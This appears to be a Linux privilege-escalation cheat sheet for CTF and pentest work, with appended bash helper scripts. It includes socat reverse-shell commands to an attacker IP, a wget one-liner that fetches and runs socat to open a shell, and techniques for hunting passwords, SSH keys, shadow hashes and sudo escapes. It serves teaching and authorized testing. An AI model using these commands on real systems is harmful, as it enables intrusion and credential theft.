CSbyGB - Pentips

Privilege Escalation

System Enumeration

  • hostname returns the hostname of the target machine

  • uname -a prints the kernel version, architecture and build date; the kernel version is the first thing to check against known kernel exploits

  • cat /proc/version shows the running kernel version and the compiler (gcc version) it was built with, which matters when a kernel exploit has to be compiled on or for the target

  • cat /etc/issue contains the pre-login banner with the distribution name, but it is a plain text file that an admin can edit, so do not rely on it; cat /etc/os-release is more reliable

  • ps shows the running processes

    • ps -A view all running processes

    • ps axjf view the process tree (useful to see which service spawned what)

    • ps aux The aux options show processes for all users (a), display the user that launched each process (u), and include processes that are not attached to a terminal (x).

    • ps aux | grep root lists only the processes running as root; look for services and scripts whose inputs or files we can influence

  • env shows the environment variables (credentials sometimes end up there, and an unusual PATH is worth noting)

  • lscpu gives information about the CPU architecture (needed to pick the right binaries and exploits)

  • ls -la /etc/cron.daily/ checks the daily cron jobs

  • cat /etc/crontab checks the system crontab; also look at /etc/cron.d/ and /var/spool/cron/crontabs/

  • lsblk lists block devices, file systems and additional drives that may be mounted or mountable
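The cron checks above are where a quick win often hides: a script that root runs from cron but that we can write. The following bash script is an added example, not from the original page; it parses the system-format crontabs (/etc/crontab and /etc/cron.d/*, where each rule has a user field) and flags every scheduled command whose executable, or the directory containing it, is writable by the current user. The crontab used in its test is constructed.

```bash
#!/bin/bash
# Added example, not from the original page: parse the system crontabs
# (/etc/crontab and /etc/cron.d/*) and flag scheduled commands whose script
# or containing directory the current user can write. A writable script that
# root runs from cron is a direct privilege escalation path.

# Print "user<TAB>command" for each rule in a system-format crontab
# (min hour dom mon dow user command, or @reboot user command).
cron_entries() {
    [ -r "$1" ] || return 0
    awk '
        /^[[:space:]]*(#|$)/       { next }   # comments and blank lines
        /^[[:space:]]*[A-Za-z_]+=/ { next }   # SHELL=, PATH=, MAILTO=...
        {
            if ($1 ~ /^@/) { user = $2; first = 3 }   # @reboot user cmd
            else           { user = $6; first = 7 }   # m h dom mon dow user cmd
            cmd = ""
            for (i = first; i <= NF; i++) cmd = cmd (i > first ? " " : "") $i
            printf "%s\t%s\n", user, cmd
        }' "$1"
}

# Read "user<TAB>command" lines and report the executable (first word of the
# command, or the directory handed to run-parts) when it, or its parent
# directory, is writable by the current user.
flag_writable_targets() {
    tab="$(printf '\t')"
    while IFS="$tab" read -r user cmd; do
        target="${cmd%% *}"
        case "$target" in
            */run-parts|run-parts) target="${cmd##* }" ;;   # run-parts [opts] DIR
            /*) ;;                                           # absolute path, check as-is
            *)  target="$(command -v "$target" 2>/dev/null)" || continue ;;
        esac
        if [ -w "$target" ]; then
            printf 'WRITABLE_FILE user=%s %s\n' "$user" "$target"
        elif [ -w "$(dirname "$target")" ]; then
            printf 'WRITABLE_DIR user=%s %s\n' "$user" "$(dirname "$target")"
        fi
    done
}

# Audit the usual system crontab locations; run as the low-privileged user.
audit_cron() {
    for f in /etc/crontab /etc/cron.d/*; do
        cron_entries "$f"
    done | flag_writable_targets
}
```

Run audit_cron on the target. A WRITABLE_DIR hit on a directory such as /tmp is as good as a writable file: the script can be replaced before the next run. User crontabs under /var/spool/cron/crontabs have no user field and are not parsed by cron_entries.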

PSPY

  • pspy is a tool to watch processes as they start, without root, by polling procfs. It catches short-lived commands run by cron or by other users that a single ps would miss. We can get it from its GitHub releases (DominicBreuker/pspy); copy the static pspy64 (or pspy32 on 32-bit targets) binary to the target

  • And then we just need to launch it: ./pspy64 -pf -i 1000 The -pf flags tell the tool to print commands and file system events and -i 1000 tells it to scan procfs every 1000ms (every second). Let it run for a few minutes so that cron jobs have time to fire
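To see what pspy actually does, here is the same idea in plain shell, written as an added example (it is not pspy's own code and not from the original page): snapshot /proc, poll again, and print every process that was not there before, with its UID. It assumes /proc is not mounted with hidepid (otherwise other users' processes are invisible); the snapshot files used in its test are constructed.

```bash
#!/bin/bash
# Added example, not pspy itself: the idea behind pspy in plain shell.
# /proc/<pid>/cmdline and /proc/<pid>/status are readable by everyone unless
# /proc is mounted with hidepid, so an unprivileged user can poll procfs and
# catch short-lived commands (cron jobs, other users' scripts) with their UID.

# One snapshot: "pid<TAB>uid<TAB>cmdline" for every process with a cmdline.
snapshot_procs() {
    local p pid uid cmd
    for p in /proc/[0-9]*; do
        pid="${p#/proc/}"
        uid=$(awk '/^Uid:/ { print $2; exit }' "$p/status" 2>/dev/null) || continue
        cmd=$(tr '\0' ' ' 2>/dev/null < "$p/cmdline") || continue
        cmd="${cmd% }"                                # drop the space from the final NUL
        [ -n "$uid" ] && [ -n "$cmd" ] || continue    # kernel threads have no cmdline
        printf '%s\t%s\t%s\n' "$pid" "$uid" "$cmd"
    done | sort
}

# Lines present in snapshot file $2 but not in $1: the processes that
# appeared between two polls. Exact line match, so a daemon restarted with a
# new pid shows up as well.
new_procs() {
    grep -vxF -f "$1" "$2" || true
}

# Poll every $1 seconds (default 1) and print each newly seen process.
watch_procs() {
    local interval="${1:-1}" prev cur tab
    tab="$(printf '\t')"
    prev=$(mktemp); cur=$(mktemp)
    snapshot_procs > "$prev"
    while :; do
        sleep "$interval"
        snapshot_procs > "$cur"
        new_procs "$prev" "$cur" | while IFS="$tab" read -r pid uid cmd; do
            printf '%s  pid=%s uid=%s  %s\n' "$(date +%T)" "$pid" "$uid" "$cmd"
        done
        cp "$cur" "$prev"
    done
}

# usage: bash procwatch.sh --watch 1   (procwatch.sh is a hypothetical file name)
if [ "${1:-}" = "--watch" ]; then watch_procs "${2:-1}"; fi
```

The one-second poll misses commands that finish in less time; pspy defaults to 100ms and additionally uses inotify on file system events to trigger an immediate scan, which is why it catches more than this loop does.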

User enumeration

  • whoami gives the username

  • id gives a general overview of the user's privilege level and group memberships (groups such as sudo, adm, docker, lxd or disk deserve a closer look, see Privileged groups)

  • cat /etc/passwd lists the users on the system

    • cat /etc/passwd | grep home | cut -d ":" -f 1 returns only the accounts with a home directory under /home, i.e. real users rather than service accounts (it also skips users whose home is elsewhere, root included)

  • cat /etc/shadow is the hash store; it is only readable by root (and the shadow group), so if we can read it the hashes can be cracked offline

  • cat /etc/group lists the groups and their members

  • history shows the previous commands; also check ~/.bash_history and the history files of other users when they are readable

  • sudo -l shows what we can run with sudo, as which user, and whether a password is needed. Example

    sudo -l
    Matching Defaults entries for cerealkiller on ip-172-31-63-238:
    	env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
    User cerealkiller may run the following commands on ip-172-31-63-238:
        (phantom) NOPASSWD: ALL
        (vimuser) NOPASSWD: /usr/bin/vim
        (nmapuser) NOPASSWD: /usr/bin/nmap
  • sudo -u phantom cat /home/phantom/flag.txt executes a command as another user; with (phantom) NOPASSWD: ALL as above we can run anything as phantom. For a single binary allowed through sudo, check GTFOBins for a known shell escape (vim and nmap both have one)

  • find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null finds world-writable directories

  • find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null finds world-writable files
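Reading sudo -l output by eye is fine for three rules, but real hosts can have dozens. The bash script below is an added example, not from the original page: it parses the "(runas) [NOPASSWD:] command" rules out of sudo -l output and tells you which ones grant ALL and which binaries have a documented shell escape on GTFOBins (the escape list is a hand-picked subset of GTFOBins sudo entries, not the full site). The sudo -l sample in its test is the one from this page, with one extra rule added.

```bash
#!/bin/bash
# Added example, not from the original page: triage the output of `sudo -l`.
# It extracts each "(runas) [NOPASSWD:] command" rule and flags commands that
# grant ALL or whose binary has a documented shell escape on GTFOBins.
# GTFO_SUDO_ESCAPES is a hand-picked subset of GTFOBins "sudo" entries.
GTFO_SUDO_ESCAPES="awk bash csh dash find ftp gdb less man more nmap perl php python python3 ruby sh tar vi vim zip"

# Read `sudo -l` output on stdin and print one rule per line as
# "runas<TAB>nopasswd<TAB>command". Preamble lines ("Matching Defaults
# entries ...", "User x may run ...") contain no leading "(...)" and are skipped.
# A comma-separated rule such as "(root) /usr/bin/find, /usr/bin/less" becomes
# two rules; tags other than NOPASSWD: (SETENV: ...) are left in the command.
parse_sudo_l() {
    awk '
        match($0, /^[[:space:]]*\([^)]*\)/) {
            runas = substr($0, RSTART, RLENGTH)
            gsub(/^[[:space:]]*\(|\)$/, "", runas)          # strip the parentheses
            sub(/[[:space:]]*:.*$/, "", runas)              # "(root : ALL)" -> root
            rest = substr($0, RSTART + RLENGTH)
            sub(/^[[:space:]]+/, "", rest)
            nopw = "no"
            if (rest ~ /^NOPASSWD:/) { nopw = "yes"; sub(/^NOPASSWD:[[:space:]]*/, "", rest) }
            n = split(rest, cmds, /,[[:space:]]*/)
            for (i = 1; i <= n; i++) printf "%s\t%s\t%s\n", runas, nopw, cmds[i]
        }'
}

# Add a verdict to each parsed rule: "runas<TAB>nopasswd<TAB>command<TAB>verdict".
triage_sudo_l() {
    tab="$(printf '\t')"
    parse_sudo_l | while IFS="$tab" read -r runas nopw cmd; do
        bin="${cmd%% *}"; bin="${bin##*/}"                  # /usr/bin/vim -> vim
        if [ "$cmd" = "ALL" ]; then
            if [ "$runas" = "ALL" ] || [ "$runas" = "root" ]; then
                verdict="root shell: sudo /bin/bash"
            else
                verdict="any command as $runas: sudo -u $runas /bin/bash"
            fi
        elif echo " $GTFO_SUDO_ESCAPES " | grep -qF " $bin "; then
            verdict="shell escape documented at https://gtfobins.github.io/gtfobins/$bin/"
        else
            verdict="no known escape; check its arguments, config files and writable paths"
        fi
        printf '%s\t%s\t%s\t%s\n' "$runas" "$nopw" "$cmd" "$verdict"
    done
}

# usage: sudo -l | triage_sudo_l
```

A rule with no documented escape is not safe by itself: a script allowed through sudo that sources a writable file, or a binary resolved through a relative path, is still exploitable, which is what the last verdict reminds you to check.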

Network Enumeration

  • ifconfig shows information about the network interfaces of the system (it may be missing on recent distributions)

  • ip addr (or ip a) is the modern equivalent of ifconfig

  • ip route shows the network routes; an extra route or a second interface means there is another network to pivot into

  • arp -a or ip neigh shows the ARP cache, i.e. the hosts this machine has recently talked to

  • netstat gathers information on existing connections (on systems without netstat, ss accepts the same -t, -u, -l, -p and -n options)

    • netstat -a shows all listening ports and established connections.

    • netstat -at or netstat -au lists only TCP or UDP sockets respectively.

    • netstat -l lists ports in "listening" mode. These ports are open and ready to accept incoming connections; add t to list only the TCP ones (netstat -lt). Services bound to 127.0.0.1 only are interesting: they are not reachable from outside but they are from our shell.

    • netstat -s lists network usage statistics by protocol. This can also be used with the -t or -u options to limit the output to a specific protocol.

    • netstat -ltp lists the listening ports together with the service name and PID (the PID of other users' processes is only shown when running as root).

    • netstat -i shows interface statistics.

    • netstat -ano: -a displays all sockets, -n does not resolve names, -o displays timers

Password Hunting

  • grep -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null searches the whole file system for the word PASSWORD (-r recursive, -n line numbers, -w whole word, -i case-insensitive). We can also search for "PASSWORD=" to narrow the search to assignments; drop -w in that case, because the = makes the whole-word match fail when a value follows it. Expect noise from /proc and /sys; restricting the search to /etc, /var, /opt, /home and the web root is much faster.

  • We can also hunt down SSH keys with find / -name authorized_keys 2> /dev/null or find / -name id_rsa 2> /dev/null (also look for id_ed25519 and id_ecdsa, and check that a private key we find is actually readable and not passphrase-protected)

Misc CTF tricks

Read file with nmap

  • Being creative with nmap if we do not have the rights to read a specific file: -iL reads the list of targets from a file, and nmap prints every line it cannot resolve as a host, so the file content leaks through the error message. Here nmap runs as nmapuser through sudo (see the sudo -l output above), and nmapuser can read the file even though we cannot

    sudo -u nmapuser nmap -iL flag.txt 127.0.0.1
    Starting Nmap 7.60 ( https://nmap.org ) at 2020-06-21 02:54 UTC
    Failed to resolve "HF-B2C56B421F6229316B00A973586AAAD1".
    WARNING: No targets were specified, so 0 hosts scanned.
    Nmap done: 0 IP addresses (0 hosts up) scanned in 0.04 seconds

  • This only shows lines that are not valid host names or addresses, so it suits short flag files rather than arbitrary files. When nmap can be run with sudo, GTFOBins lists ways to get a shell out of it instead, which is worth more than a single file read

Upgrade a reverse shell to a fully TTY interactive shell

  • Sometimes we will get a shell but it won't be very convenient (no tab completion, Ctrl-C kills the connection, su and text editors do not work). There are some ways to upgrade it to an interactive TTY reverse shell

  • python -c 'import pty; pty.spawn("/bin/bash")' is a quick and dirty fix, not completely interactive, but it works well. For python3 it is the same: python3 -c 'import pty; pty.spawn("/bin/bash")'

  • With socat, which gives a fully interactive shell in one step

    • socat file:`tty`,raw,echo=0 tcp-listen:4444 on your kali (the backticks around tty are part of the command: they substitute the path of your current terminal)

    • socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 from the victim machine (10.0.3.4 being the attacker's IP)

    • If socat is not installed on the target, use a static binary

      • either fetch it directly on the target: wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

      • or, when the target has no Internet access, download it on your kali with wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat, serve it with your python3 web server, and then on the target: wget -q http://YOUR-KALI-IP/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:YOUR-KALI-IP:4444
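The python pty trick becomes fully interactive with two more steps (stty raw -echo on the attacker side, then TERM and terminal size on the victim side). The bash script below is an added example, not from the original page: find_pty_spawner picks a pty spawner from what is installed on the victim (python3, python, util-linux script, or socat, in that order), and tty_upgrade_walkthrough prints the whole sequence with the attacker's real terminal size filled in. ATTACKER_IP and port 4444 are placeholders.

```bash
#!/bin/bash
# Added example, not from the original page: the manual pty + stty upgrade of
# a netcat reverse shell, plus a helper that picks a pty spawner from what is
# installed on the victim. ATTACKER_IP and port 4444 are placeholders.

# Paste this function into the victim shell and call it: it prints the command
# that spawns a pty with whatever is available, in order of preference, and
# returns 1 when nothing usable is installed.
find_pty_spawner() {
    if command -v python3 >/dev/null 2>&1; then
        echo "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"
    elif command -v python >/dev/null 2>&1; then
        echo "python -c 'import pty; pty.spawn(\"/bin/bash\")'"
    elif command -v script >/dev/null 2>&1; then
        echo "script -qc /bin/bash /dev/null"      # util-linux script, no python needed
    elif command -v socat >/dev/null 2>&1; then
        echo "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER_IP:4444"
    else
        return 1
    fi
}

# Commands to type in the victim shell once it has a pty: terminal type and
# the attacker's terminal size, so full-screen programs (vim, less) render.
remote_fixup_cmds() {
    printf 'export TERM=xterm SHELL=/bin/bash; stty rows %s cols %s\n' "$1" "$2"
}

# "rows cols" of the local terminal, or 24 80 when there is no tty.
local_term_size() {
    stty size 2>/dev/null || echo "24 80"
}

# Run on the attacker: the full sequence with the real terminal size filled in.
tty_upgrade_walkthrough() {
    set -- $(local_term_size)
    cat <<EOF
# 1. victim> spawn a pty (paste find_pty_spawner into the victim shell to see
#    which spawner is available); with python3:
python3 -c 'import pty; pty.spawn("/bin/bash")'
# 2. press Ctrl-Z to background the reverse shell, then attacker>
stty raw -echo; fg
# 3. press Enter once, then victim>
$(remote_fixup_cmds "$1" "$2")
# 4. afterwards, to restore the attacker terminal: reset
EOF
}
```

Ctrl-Z and fg are typed by hand; they cannot be scripted because the reverse shell is a foreground job of your own terminal. After step 2 your local terminal stops echoing, which is expected: the victim pty now does the echoing, and that is what makes Ctrl-C and tab completion work inside the reverse shell.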

Automated Tools

  • We can run one tool and, if we do not see anything, try another one. The usual ones are LinPEAS, LinEnum, Linux Exploit Suggester and Linux Priv Checker; they only automate the enumeration above, so read their output with the manual checks in mind

    • The color code is very useful: we definitely have to investigate things in red and yellow, or just in red

Checklist

  • Checklist - Linux Privilege Escalation (HackTricks)

  • Linux - Privilege Escalation (PayloadsAllTheThings, swisskyrepo/PayloadsAllTheThings, file Linux - Privilege Escalation.md)

Resources

  • Linux Privesc on TCM-Security Academy; the course resources are at https://github.com/TCM-Course-Resources/Linux-Privilege-Escalation-Resources

  • Basic Linux Privilege Escalation - g0tmi1k

  • GTFOBins, a curated list of Unix binaries that can be abused to bypass local security restrictions

  • Privilege Escalation - Linux, Total OSCP Guide (Sushant 747's guide; country dependent, may need a VPN)

  • The ropnop blog article on upgrading simple shells to fully interactive TTYs, which shows multiple ways to do so

  • Static socat binaries, if socat is not installed on the target: https://github.com/andrew-d/static-binaries

Last updated 2 years ago